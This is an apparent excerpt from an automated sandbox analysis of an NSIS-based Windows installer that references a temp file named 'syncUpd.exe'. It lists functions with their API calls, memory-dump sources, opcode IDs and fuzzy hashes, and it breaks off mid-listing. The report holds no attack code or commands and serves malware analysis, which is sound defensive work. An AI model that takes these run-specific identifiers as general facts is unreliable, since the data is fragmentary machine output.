                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                                                              • Opcode ID: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                                                                                                                                                              • Instruction ID: c8608c254b430b602e84f9c27618fc09d2b238f80b7c42c251c9764424cdbd58
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9D067B45043049FD300FF6CD54970ABBE4AB44344F80C828E98897251D679D4548B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 004085B8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32 ref: 004085D9
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32 ref: 00408694
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 0040879C
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004087AF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileFind$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                                              • API String ID: 3200608346-1684325040
                                                                                                                                                                                                                                                              • Opcode ID: f316a10b61eed65b899ef9fabb196a4043542334212cd6f025015e3779df5493
                                                                                                                                                                                                                                                              • Instruction ID: 15a94c35718d9934db7cd19974bec7e4185b96846047f3cacb9e12796964f464
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f316a10b61eed65b899ef9fabb196a4043542334212cd6f025015e3779df5493
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E7175B0908344AED720AF25CE4576EBBF8AF45714F45887EE8C5A7381CB3D8844CB5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040710B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 358windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Window$ClipboardShow$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleItemLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                                              • String ID: @Vl
                                                                                                                                                                                                                                                              • API String ID: 1085758737-658408307
                                                                                                                                                                                                                                                              • Opcode ID: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                                                                                                                                                              • Instruction ID: 5e12382b9bf781896070c4bfdd92391929ae8e3bc4ad132af5f990d2ac7018d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAF1E5B0908304AFD710EF68D98866EBFF4FF84314F41892DE89997291D7789885CF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404FED Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 461windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ItemMessageSendWindow$ClassDestroyDialogEnableLongMenuShowText
                                                                                                                                                                                                                                                              • String ID: NSIS Software Setup
                                                                                                                                                                                                                                                              • API String ID: 1257292352-2653429224
                                                                                                                                                                                                                                                              • Opcode ID: 0f02577a68e9ff9d90e3bf1c3deeb1ba762514f41c0870b647374f54dc0cec14
                                                                                                                                                                                                                                                              • Instruction ID: 81f075938f45a7985b655ae660e62a259a3a74716ec96c8beebe6fa6edba758e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f02577a68e9ff9d90e3bf1c3deeb1ba762514f41c0870b647374f54dc0cec14
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B12EDB0904700EFD720AF69D98876FBBF4EB84714F50893EE88497290D7789885DF5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004057B5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 246windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • @Vl, xrefs: 004058C5
                                                                                                                                                                                                                                                              • Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00405A4A
                                                                                                                                                                                                                                                              • #, xrefs: 00405840
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Item$Cursor$ButtonCheckColorExecuteShell
                                                                                                                                                                                                                                                              • String ID: #$@Vl$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                                                                                                                                                                                                              • API String ID: 3348721118-4167341434
                                                                                                                                                                                                                                                              • Opcode ID: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
                                                                                                                                                                                                                                                              • Instruction ID: 44f7cc544d88e5f9b0c99828474254857af221e4d6201ddb95d9c50adba5cc38
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5B1E7B0908704AFD710AF69D58876EBBF0FF44314F40892DE889A7381D779A885CF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401000 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateIndirectRect$BeginBrushClientColorDeleteFillFontModeObjectPaintProcTextWindow
                                                                                                                                                                                                                                                              • String ID: @Vl$NSIS Software Setup
                                                                                                                                                                                                                                                              • API String ID: 2207649800-573637699
                                                                                                                                                                                                                                                              • Opcode ID: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                                                                                                                                                              • Instruction ID: 8fd51326f023e27f82ac7456779bc240a2534a06902e8bdd8a27472bfc587b1b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 046115B09047089FCB24DFA9C9885AEBBF8FF88310F50892EE499D7251D734A845DF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00408311 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 176filememoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00408822), ref: 00408383
                                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 0040839D
                                                                                                                                                                                                                                                                • Part of subcall function 004079B4: lstrlenA.KERNEL32 ref: 004079CC
                                                                                                                                                                                                                                                                • Part of subcall function 004079B4: lstrcmpiA.KERNEL32 ref: 004079F4
                                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 004083C8
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004083FF
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32 ref: 0040845A
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 00408476
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?), ref: 004084A2
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 00408568
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: GetFileAttributesA.KERNELBASE ref: 00407A85
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 0040858B
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00408597
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 004085A1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Handle$CloseGlobalNamePathShort$AddressAllocAttributesCreateFreeModulePointerProcReadSizeWritelstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: @Vl
                                                                                                                                                                                                                                                              • API String ID: 1472977481-658408307
                                                                                                                                                                                                                                                              • Opcode ID: 2f688b72e527af7ea3e8ca39ec6c423c40bf0fcbc8cf1a14568df8390cd70205
                                                                                                                                                                                                                                                              • Instruction ID: 94d356f40ec1d5b6b18a4eade4987fc681b306d1f2835a3a3d653d78bc44f301
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f688b72e527af7ea3e8ca39ec6c423c40bf0fcbc8cf1a14568df8390cd70205
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70710AB0908305AFD710AF65DA8866FBBF4FF84704F50C82EE9C497251DB789445CB9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00405C44 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 327COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405CAA
                                                                                                                                                                                                                                                              • SetWindowTextA.USER32 ref: 00405CE6
                                                                                                                                                                                                                                                                • Part of subcall function 00407805: GetDlgItemTextA.USER32 ref: 00407829
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 00405FAC
                                                                                                                                                                                                                                                              • MulDiv.KERNEL32 ref: 00405FD2
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • A, xrefs: 00405DE1
                                                                                                                                                                                                                                                              • @Vl, xrefs: 00405E0C
                                                                                                                                                                                                                                                              • Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00405E3E, 00405E51
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Char$Next$ItemText$DiskFreePrevSpaceWindow
                                                                                                                                                                                                                                                              • String ID: @Vl$A$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                                                                                                                                                                                                              • API String ID: 2917460849-3607896351
                                                                                                                                                                                                                                                              • Opcode ID: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                                                                                                                                                              • Instruction ID: 826313f772001043a55ea6ee256f7e169a774654cc20dc23f9f2a1aa091d3067
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FD128B09087049FDB10EF69D58466EBBF4FF44304F51893EE888A7281D7789985CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407E06 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 236stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?), ref: 00407EE6
                                                                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 00407F25
                                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00407FC6
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32 ref: 00407FEC
                                                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32 ref: 00408018
                                                                                                                                                                                                                                                              • SHGetPathFromIDListA.SHELL32 ref: 00408073
                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32 ref: 00408084
                                                                                                                                                                                                                                                                • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: .$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                                                                                                                                                                                                              • API String ID: 3880481140-2519235616
                                                                                                                                                                                                                                                              • Opcode ID: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                                                                                                                                                              • Instruction ID: afc503830e017d1618816f2a7c40fbe451ee37b9332185e2dde12f9a903aaa14
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB918E71D082149FDB20DF69C9846AEBBF4EF48300F55853EE894A7381D738A845CB9B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404F0F Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                                                                              • Opcode ID: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                                                                                                                                                              • Instruction ID: 1780d8928a2120b8c11af9b20abdfd96f0510a7958c84a0cc1c987df9bbb4b6c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF3128B09047069BDB10DFA8D988A6BBFE4BF48314F04886DFD94DB251D374D941CB66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403491 Relevance: 10.6, APIs: 7, Instructions: 132filememoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(759205F0), ref: 004034EF
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 0040351C
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00403653
                                                                                                                                                                                                                                                                • Part of subcall function 00403B31: SetFilePointer.KERNELBASE ref: 00403B56
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNELBASE ref: 00403B15
